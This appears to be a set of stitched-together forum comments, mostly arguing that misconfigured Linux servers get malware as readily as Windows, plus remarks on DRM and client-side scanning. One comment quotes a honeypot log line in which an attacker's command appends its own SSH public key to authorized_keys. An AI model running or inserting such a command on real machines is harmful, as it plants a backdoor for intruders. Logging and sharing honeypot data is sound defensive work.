It's configured to allow requests from connections using common default passwords. If it wasn't a honeypot the requests would succeed. I don't currently run an rdp honeypot but I did a few years back, iirc the rates were about the same with rdp being a little bit less. Which as I say, comes down to configuration and usage. If you misconfigure Linux you will get malware, same as Windows.
Glad you asked, I run a ssh honeypot and get multiple connections adding ssh keys, trying to run lockr, downloading shit every day.
2023-09-16T09:09:48+0000 [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,14737,61.222.241.108] Command found: echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr >> .ssh/authorized_keys
It's not any more difficult to get a virus on Linux than Windows. It comes down to experience as you said. I've been using Windows for my entire life and haven't gotten a virus since I was 8. But all it takes is one mistake on both Windows and Linux, you accidentally leave a docker endpoint or ssh server exposed and insufficiently protected on Linux and you're going to get a virus the same as if you accidentally opened a .pdf.exe on Windows.
Mirai and other botnets, coin miners, ransomware... Do you think that malware makers just decided to ignore the billions of Linux servers and IoT devices that exist?
I don't really understand that belief. There is plenty of Linux malware especially targeting servers, you just need to have an unsecure service running to find that out
It's literally just the OnePlus business model from scratch and people are eating up like it's new as if they won't be hating the brand 5 years from now. The founder is even the exact same guy. I don't get how people are falling for it a second time.
If there was a foolproof way of checking for a pirated copy they wouldn't be making a game engine they'd be making DRM
Did I say that? You can never prevent it completely, so you still need to protect people as well as educating people.
They want to do client side scanning which technically keeps E2E encryption but basically destroys the principle behind it. Today it's CSAM, tomorrow its terrorism related phrases, next year its "anti-government sentiment"
My understanding is they've done bugger all. MP's behind the bill have merely said they won't use the provision, primarily because there is no sufficient technical means to do so, but the wording of the bill hasn't changed.
What will happen here will be exactly like what happened with the net neutrality laws in the US. Even if we beat it once they'll just keep trying until the media gets fatigued and they can pass it without a large amount of uproar. There's no legal way for us to stop them.
I think the Internet is playing a large part but it's definitely not the only cause by far
Zero days aren't the only way you get viruses. Misconfiguration and social engineering are both vectors that are OS agnostic.